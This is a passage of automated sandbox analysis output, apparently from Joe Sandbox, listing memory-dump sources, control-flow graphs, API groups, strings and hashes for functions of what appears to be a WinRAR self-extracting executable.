                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EnvironmentExecuteExpandShellStrings
                                                                                                                                            • String ID: %s%s%u$%s.%d.tmp$.lnk$<br>$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                            • API String ID: 3420131149-2038501859
                                                                                                                                            • Opcode ID: 3b83f4e13dc0a149532fb4b0f17680c2431fb1815338157442d4deddf3c819d2
                                                                                                                                            • Instruction ID: 416bbbdb8ad9931a284362dfa271f8975be254486443c81d90078f570c42695d
                                                                                                                                            • Opcode Fuzzy Hash: 3b83f4e13dc0a149532fb4b0f17680c2431fb1815338157442d4deddf3c819d2
                                                                                                                                            • Instruction Fuzzy Hash: CC826123A1868287EB30AB20D8513F92369FF50784F904436D54DCB5A9DF7FE644EB4A

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 714 7ff6ef6d5334-7ff6ef6d53a7 call 7ff6ef6c5008 call 7ff6ef6d0b5c call 7ff6ef6d13a0 call 7ff6ef6d7ac0 GetCommandLineW 723 7ff6ef6d5471-7ff6ef6d55c2 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime call 7ff6ef6b552c SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff6ef6d2288 call 7ff6ef6c1aac call 7ff6ef6cf278 * 2 DialogBoxParamW call 7ff6ef6cf354 * 2 714->723 724 7ff6ef6d53ad-7ff6ef6d53bc call 7ff6ef6d338c 714->724 757 7ff6ef6d55c4 Sleep 723->757 758 7ff6ef6d55ca-7ff6ef6d55d1 723->758 729 7ff6ef6d53c2-7ff6ef6d53de OpenFileMappingW 724->729 730 7ff6ef6d5469-7ff6ef6d546c call 7ff6ef6d4e64 724->730 733 7ff6ef6d545e-7ff6ef6d5467 CloseHandle 729->733 734 7ff6ef6d53e0-7ff6ef6d53fc MapViewOfFile 729->734 730->723 733->723 736 7ff6ef6d5455-7ff6ef6d5458 UnmapViewOfFile 734->736 737 7ff6ef6d53fe-7ff6ef6d5450 call 7ff6ef6d8950 call 7ff6ef6d4e64 call 7ff6ef6c37e8 call 7ff6ef6c3934 call 7ff6ef6c39a4 734->737 736->733 737->736 757->758 759 7ff6ef6d55d3 call 7ff6ef6d1770 758->759 760 7ff6ef6d55d8-7ff6ef6d55ec call 7ff6ef6c3718 758->760 759->760 764 7ff6ef6d55ee-7ff6ef6d55f5 call 7ff6ef6d688c 760->764 765 7ff6ef6d55fa-7ff6ef6d5611 DeleteObject 760->765 764->765 767 7ff6ef6d5613 DeleteObject 765->767 768 7ff6ef6d5619-7ff6ef6d5620 765->768 767->768 769 7ff6ef6d5622-7ff6ef6d5629 768->769 770 7ff6ef6d563c-7ff6ef6d564d 768->770 769->770 771 7ff6ef6d562b-7ff6ef6d5637 call 7ff6ef6b8c9c 769->771 772 7ff6ef6d564f-7ff6ef6d565b call 7ff6ef6d4ef4 CloseHandle 770->772 773 7ff6ef6d5661-7ff6ef6d566e 770->773 771->770 772->773 776 7ff6ef6d5693-7ff6ef6d5698 call 7ff6ef6d1418 773->776 777 7ff6ef6d5670-7ff6ef6d567d 773->777 784 7ff6ef6d569d-7ff6ef6d56c6 call 7ff6ef6d6760 776->784 779 7ff6ef6d567f-7ff6ef6d5687 777->779 780 7ff6ef6d568d-7ff6ef6d568f 777->780 779->776 782 7ff6ef6d5689-7ff6ef6d568b 779->782 780->776 783 7ff6ef6d5691 780->783 782->776 783->776
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressEnvironmentFileHandleProcVariable$Module$CloseDeleteObjectView$CommandCurrentDialogDirectoryIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepTimeUnmapswprintf
                                                                                                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                            • API String ID: 1691232531-3710569615
                                                                                                                                            • Opcode ID: 62ccf693bea90dd8faf23712a3662db8c7ca790b9ebf779ec010995198d30e49
                                                                                                                                            • Instruction ID: da0249d26ff5168c5ae3d596a11d02cad68de0070a9a82689fb7d1c161911426
                                                                                                                                            • Opcode Fuzzy Hash: 62ccf693bea90dd8faf23712a3662db8c7ca790b9ebf779ec010995198d30e49
                                                                                                                                            • Instruction Fuzzy Hash: EAA16D27A1864287FB50EB20E8543B933A9BF84744F500035E94DC7AA5DF3FE519EB4A

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
                                                                                                                                            • String ID: $%s:$CAPTION
                                                                                                                                            • API String ID: 2100155373-404845831
                                                                                                                                            • Opcode ID: 66fafb6747b2519cb4a08f55def08290f9512f8099f1da877605a45cd61ed12f
                                                                                                                                            • Instruction ID: dd5c12931383bea5de989a99a1da20f092a3cff22c3777101f94b63e8ad4f360
                                                                                                                                            • Opcode Fuzzy Hash: 66fafb6747b2519cb4a08f55def08290f9512f8099f1da877605a45cd61ed12f
                                                                                                                                            • Instruction Fuzzy Hash: 5191F677B1864287EB14DF29E84076A67A5FBC4B84F505135EE8D87B98CF3EE8058B00

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                                            • String ID: PNG
                                                                                                                                            • API String ID: 211097158-364855578
                                                                                                                                            • Opcode ID: 6b298fa5a1b118b59a46482d0601480174dd81c34f5ca8c079f7314dfa3cdfcd
                                                                                                                                            • Instruction ID: d3dd11e884173965feaf6fd4fe6860331e8ea475e5ffb7dc717762c78b370aa2
                                                                                                                                            • Opcode Fuzzy Hash: 6b298fa5a1b118b59a46482d0601480174dd81c34f5ca8c079f7314dfa3cdfcd
                                                                                                                                            • Instruction Fuzzy Hash: EC416D27A09B0283EF04AB55E85437963A8EF89B94F140536CD0D87368EF7FE449DB06

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Token$DescriptorInformationProcessSecurity$CopyCreateCurrentDaclDirectoryEntriesErrorFreeInitializeLastLocalOpen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2740647886-0
                                                                                                                                            • Opcode ID: ce400f2da4878de5fb046944169b934d3693131bb16abb635702ab8aecb66311
                                                                                                                                            • Instruction ID: 72d92e946058cad23a6117279e010061f896be575005e5dbedca599fc7afdbd7
                                                                                                                                            • Opcode Fuzzy Hash: ce400f2da4878de5fb046944169b934d3693131bb16abb635702ab8aecb66311
                                                                                                                                            • Instruction Fuzzy Hash: 70416D33618B8287FB509F61E8447AA73B8FB88B84F500135EA4E97A58DF3ED505DB05

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1326 7ff6ef6b42c4-7ff6ef6b4325 call 7ff6ef6d6bd0 call 7ff6ef6c0910 1331 7ff6ef6b45d7 1326->1331 1332 7ff6ef6b432b-7ff6ef6b433d 1326->1332 1334 7ff6ef6b45da-7ff6ef6b45e4 call 7ff6ef6c0bcc 1331->1334 1332->1331 1333 7ff6ef6b4343-7ff6ef6b4354 1332->1333 1335 7ff6ef6b436e-7ff6ef6b438b 1333->1335 1336 7ff6ef6b4356-7ff6ef6b4369 call 7ff6ef6b145c 1333->1336 1338 7ff6ef6b45e9-7ff6ef6b45ed 1334->1338 1341 7ff6ef6b438d-7ff6ef6b4395 call 7ff6ef6b530c 1335->1341 1346 7ff6ef6b439a-7ff6ef6b43a8 1335->1346 1345 7ff6ef6b4cf4-7ff6ef6b4cfc 1336->1345 1340 7ff6ef6b45f3-7ff6ef6b4626 call 7ff6ef6c09b4 call 7ff6ef6c0b58 call 7ff6ef6c0b10 1338->1340 1338->1341 1372 7ff6ef6b462c-7ff6ef6b462e 1340->1372 1373 7ff6ef6b4ceb-7ff6ef6b4cf3 call 7ff6ef6b2c84 1340->1373 1341->1345 1350 7ff6ef6b4cfe call 7ff6ef6dbe38 1345->1350 1351 7ff6ef6b4d03 1345->1351 1352 7ff6ef6b43b6 1346->1352 1353 7ff6ef6b43aa-7ff6ef6b43b4 call 7ff6ef6c668c 1346->1353 1350->1351 1355 7ff6ef6b4d05-7ff6ef6b4d34 call 7ff6ef6d6760 1351->1355 1356 7ff6ef6b43b9-7ff6ef6b43d2 1352->1356 1353->1352 1353->1356 1361 7ff6ef6b43d4-7ff6ef6b43db 1356->1361 1362 7ff6ef6b4408-7ff6ef6b442b call 7ff6ef6b50d4 1356->1362 1361->1362 1365 7ff6ef6b43dd-7ff6ef6b4404 call 7ff6ef6b5278 1361->1365 1374 7ff6ef6b449d-7ff6ef6b44e9 call 7ff6ef6b7788 1362->1374 1365->1362 1372->1373 1376 7ff6ef6b4634-7ff6ef6b4640 1372->1376 1373->1345 1381 7ff6ef6b44ef-7ff6ef6b4508 1374->1381 1382 7ff6ef6b442d-7ff6ef6b4434 1374->1382 1376->1373 1379 7ff6ef6b4646-7ff6ef6b464a 1376->1379 1379->1373 1383 7ff6ef6b4650-7ff6ef6b4664 call 7ff6ef6c0bcc 1379->1383 1381->1334 1384 7ff6ef6b450e-7ff6ef6b454d call 7ff6ef6d6780 * 2 call 7ff6ef6d688c 1381->1384 1382->1381 1385 7ff6ef6b443a-7ff6ef6b4452 call 7ff6ef6d8850 1382->1385 1383->1341 1392 7ff6ef6b466a-7ff6ef6b46c0 call 7ff6ef6c0ae0 call 7ff6ef6c0b10 * 2 1383->1392 1384->1334 1385->1381 1394 7ff6ef6b4458-7ff6ef6b4461 1385->1394 1415 7ff6ef6b46c2-7ff6ef6b46e5 call 7ff6ef6b2c84 call 7ff6ef6b8c9c 1392->1415 1416 7ff6ef6b46fb-7ff6ef6b4705 1392->1416 1396 7ff6ef6b4552-7ff6ef6b4587 call 7ff6ef6b28f4 call 7ff6ef6b8c9c 1394->1396 1397 7ff6ef6b4467-7ff6ef6b4498 call 7ff6ef6b28f4 call 7ff6ef6c3718 call 7ff6ef6b50d4 1394->1397 1396->1345 1417 7ff6ef6b458d-7ff6ef6b45d2 call 7ff6ef6d6780 * 2 call 7ff6ef6d688c 1396->1417 1397->1374 1415->1416 1438 7ff6ef6b46e7-7ff6ef6b46f6 call 7ff6ef6b28f4 1415->1438 1420 7ff6ef6b4723-7ff6ef6b472d 1416->1420 1421 7ff6ef6b4707-7ff6ef6b471d call 7ff6ef6c0b10 1416->1421 1417->1345 1423 7ff6ef6b472f-7ff6ef6b4739 call 7ff6ef6c0b10 1420->1423 1424 7ff6ef6b473c-7ff6ef6b4754 call 7ff6ef6b1c34 1420->1424 1421->1373 1421->1420 1423->1424 1436 7ff6ef6b4771 1424->1436 1437 7ff6ef6b4756-7ff6ef6b4759 1424->1437 1442 7ff6ef6b4774-7ff6ef6b4786 1436->1442 1437->1436 1440 7ff6ef6b475b-7ff6ef6b476f 1437->1440 1438->1416 1440->1436 1440->1442 1445 7ff6ef6b478c-7ff6ef6b478f 1442->1445 1446 7ff6ef6b4c1a-7ff6ef6b4c8d call 7ff6ef6be6a0 call 7ff6ef6c0b10 1442->1446 1448 7ff6ef6b4795-7ff6ef6b4798 1445->1448 1449 7ff6ef6b4913-7ff6ef6b498b call 7ff6ef6be5f8 call 7ff6ef6c0b10 * 2 1445->1449 1467 7ff6ef6b4c8f-7ff6ef6b4c99 call 7ff6ef6c0b10 1446->1467 1468 7ff6ef6b4c9b 1446->1468 1448->1449 1452 7ff6ef6b479e-7ff6ef6b47a1 1448->1452 1484 7ff6ef6b499e-7ff6ef6b49ce call 7ff6ef6c0b10 1449->1484 1485 7ff6ef6b498d-7ff6ef6b4997 1449->1485 1453 7ff6ef6b47a3-7ff6ef6b47a6 1452->1453 1454 7ff6ef6b47ed-7ff6ef6b4813 call 7ff6ef6c0b10 1452->1454 1457 7ff6ef6b4cd3-7ff6ef6b4cdf 1453->1457 1458 7ff6ef6b47ac-7ff6ef6b47e8 call 7ff6ef6c0b10 1453->1458 1471 7ff6ef6b4815-7ff6ef6b4818 1454->1471 1472 7ff6ef6b4842-7ff6ef6b486e call 7ff6ef6c0b10 call 7ff6ef6c0960 1454->1472 1464 7ff6ef6b4ce1 call 7ff6ef6dbe38 1457->1464 1465 7ff6ef6b4ce6-7ff6ef6b4ce9 1457->1465 1458->1457 1464->1465 1465->1355 1469 7ff6ef6b4c9e-7ff6ef6b4cab 1467->1469 1468->1469 1476 7ff6ef6b4cb1 1469->1476 1477 7ff6ef6b4cad-7ff6ef6b4caf 1469->1477 1478 7ff6ef6b481f-7ff6ef6b483d call 7ff6ef6b552c call 7ff6ef6b5354 1471->1478 1495 7ff6ef6b4870-7ff6ef6b4877 1472->1495 1496 7ff6ef6b4879-7ff6ef6b4897 call 7ff6ef6c0a2c 1472->1496 1482 7ff6ef6b4cb4-7ff6ef6b4cbe 1476->1482 1477->1476 1477->1482 1478->1345 1482->1457 1488 7ff6ef6b4cc0-7ff6ef6b4cce call 7ff6ef6b2e60 1482->1488 1498 7ff6ef6b49d0-7ff6ef6b49e3 call 7ff6ef6c09b4 call 7ff6ef6c6038 1484->1498 1499 7ff6ef6b49e8-7ff6ef6b49f9 1484->1499 1485->1484 1488->1457 1495->1478 1509 7ff6ef6b4899-7ff6ef6b4901 call 7ff6ef6c0a2c * 2 call 7ff6ef6c4634 call 7ff6ef6c4674 call 7ff6ef6c44e0 call 7ff6ef6d8850 1496->1509 1510 7ff6ef6b4907-7ff6ef6b490e 1496->1510 1498->1499 1502 7ff6ef6b4a15-7ff6ef6b4a42 call 7ff6ef6c0b10 1499->1502 1503 7ff6ef6b49fb-7ff6ef6b4a0f call 7ff6ef6c09b4 1499->1503 1514 7ff6ef6b4a44 1502->1514 1515 7ff6ef6b4a4b-7ff6ef6b4a85 call 7ff6ef6c0b10 * 2 1502->1515 1503->1502 1509->1510 1510->1457 1514->1515 1524 7ff6ef6b4a8f-7ff6ef6b4a93 1515->1524 1525 7ff6ef6b4a87-7ff6ef6b4a8d 1515->1525 1527 7ff6ef6b4a9c-7ff6ef6b4acb 1524->1527 1528 7ff6ef6b4a95 1524->1528 1525->1527 1530 7ff6ef6b4ad6 1527->1530 1531 7ff6ef6b4acd-7ff6ef6b4ad4 1527->1531 1528->1527 1533 7ff6ef6b4ad9-7ff6ef6b4b33 call 7ff6ef6c0a2c 1530->1533 1531->1530 1531->1533 1540 7ff6ef6b4d35-7ff6ef6b4d3b call 7ff6ef6d69a4 1533->1540 1541 7ff6ef6b4b39-7ff6ef6b4b57 call 7ff6ef6c67b4 1533->1541 1546 7ff6ef6b4b59-7ff6ef6b4b67 call 7ff6ef6b2e60 1541->1546 1547 7ff6ef6b4b6c-7ff6ef6b4b70 1541->1547 1546->1547 1549 7ff6ef6b4b82-7ff6ef6b4b96 call 7ff6ef6de4a0 1547->1549 1550 7ff6ef6b4b72-7ff6ef6b4b80 call 7ff6ef6b2d5c 1547->1550 1556 7ff6ef6b4b9f-7ff6ef6b4bb0 call 7ff6ef6de4a0 1549->1556 1557 7ff6ef6b4b98 1549->1557 1555 7ff6ef6b4bf9-7ff6ef6b4bfe 1550->1555 1555->1457 1558 7ff6ef6b4c04-7ff6ef6b4c15 call 7ff6ef6b28f4 1555->1558 1556->1555 1563 7ff6ef6b4bb2-7ff6ef6b4bb9 1556->1563 1557->1556 1558->1457 1563->1555 1564 7ff6ef6b4bbb-7ff6ef6b4bf2 call 7ff6ef6c0938 call 7ff6ef6c0b80 call 7ff6ef6c0b10 1563->1564 1564->1555 1571 7ff6ef6b4bf4 call 7ff6ef6dbe38 1564->1571 1571->1555
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: CMT$h%u$hc%u
                                                                                                                                            • API String ID: 0-3282847064
                                                                                                                                            • Opcode ID: 4165458ec45c8294c4d0096412a23894492d67378c37ba53c30bd610185e02d7
                                                                                                                                            • Instruction ID: 34f5d7cf6f43188f63418e00036564dafaf77af1c12a9a04d2e2d10287d5486a
                                                                                                                                            • Opcode Fuzzy Hash: 4165458ec45c8294c4d0096412a23894492d67378c37ba53c30bd610185e02d7
                                                                                                                                            • Instruction Fuzzy Hash: 0D52D133A08686A7EB08DF31C1513F967A9FB51788F444436EB4D8728ADF3AE524D706
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileFind$ErrorFirstLast$Next
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 869497890-0
                                                                                                                                            • Opcode ID: c7a9b75149be672fc0ded2493ed5d3015ede7f253c901e6da451452993f7ec22
                                                                                                                                            • Instruction ID: ac06528566ef8b12c3fc711a77ea1348a515b143001c208ddadc671ac3c01038
                                                                                                                                            • Opcode Fuzzy Hash: c7a9b75149be672fc0ded2493ed5d3015ede7f253c901e6da451452993f7ec22
                                                                                                                                            • Instruction Fuzzy Hash: 3F41B133A0868197DA249B24E5403E863A4FB497B4F000731EB7D877C9DF2EE255D705
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: __tmp_reference_source_
                                                                                                                                            • API String ID: 0-685763994
                                                                                                                                            • Opcode ID: d5c5111bd055846a360c4929355d7de54487030d753ae5b9ba6c45da8ec5d2b6
                                                                                                                                            • Instruction ID: 2bb17c4532f04ed316834ecbfdebc874b14c29c3299b5e3fb24376677178fb36
                                                                                                                                            • Opcode Fuzzy Hash: d5c5111bd055846a360c4929355d7de54487030d753ae5b9ba6c45da8ec5d2b6
                                                                                                                                            • Instruction Fuzzy Hash: 2CA2F663A0C6C287EB60CB21E4543FE67A9FB41748F444436EB8D8769ACE3EE505E305

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 826 7ff6ef6d61d0-7ff6ef6d6259 call 7ff6ef6d5e2c 829 7ff6ef6d6284-7ff6ef6d62a1 826->829 830 7ff6ef6d625b-7ff6ef6d627f call 7ff6ef6d613c RaiseException 826->830 832 7ff6ef6d62a3-7ff6ef6d62b4 829->832 833 7ff6ef6d62b6-7ff6ef6d62ba 829->833 838 7ff6ef6d6488-7ff6ef6d64a5 830->838 834 7ff6ef6d62bd-7ff6ef6d62c9 832->834 833->834 836 7ff6ef6d62ea-7ff6ef6d62ed 834->836 837 7ff6ef6d62cb-7ff6ef6d62dd 834->837 839 7ff6ef6d62f3-7ff6ef6d62f6 836->839 840 7ff6ef6d6394-7ff6ef6d639b 836->840 846 7ff6ef6d62e3 837->846 847 7ff6ef6d6459-7ff6ef6d6463 837->847 844 7ff6ef6d630d-7ff6ef6d6322 LoadLibraryExA 839->844 845 7ff6ef6d62f8-7ff6ef6d630b 839->845 842 7ff6ef6d63af-7ff6ef6d63b2 840->842 843 7ff6ef6d639d-7ff6ef6d63ac 840->843 848 7ff6ef6d6455 842->848 849 7ff6ef6d63b8-7ff6ef6d63bc 842->849 843->842 850 7ff6ef6d6324-7ff6ef6d6337 GetLastError 844->850 851 7ff6ef6d6379-7ff6ef6d6382 844->851 845->844 845->851 846->836 858 7ff6ef6d6465-7ff6ef6d6476 847->858 859 7ff6ef6d6480 call 7ff6ef6d613c 847->859 848->847 856 7ff6ef6d63be-7ff6ef6d63c2 849->856 857 7ff6ef6d63eb-7ff6ef6d63fe GetProcAddress 849->857 860 7ff6ef6d634e-7ff6ef6d6374 call 7ff6ef6d613c RaiseException 850->860 861 7ff6ef6d6339-7ff6ef6d634c 850->861 852 7ff6ef6d6384-7ff6ef6d6387 FreeLibrary 851->852 853 7ff6ef6d638d 851->853 852->853 853->840 856->857 865 7ff6ef6d63c4-7ff6ef6d63cf 856->865 857->848 864 7ff6ef6d6400-7ff6ef6d6413 GetLastError 857->864 858->859 866 7ff6ef6d6485 859->866 860->838 861->851 861->860 868 7ff6ef6d6415-7ff6ef6d6428 864->868 869 7ff6ef6d642a-7ff6ef6d6451 call 7ff6ef6d613c RaiseException call 7ff6ef6d5e2c 864->869 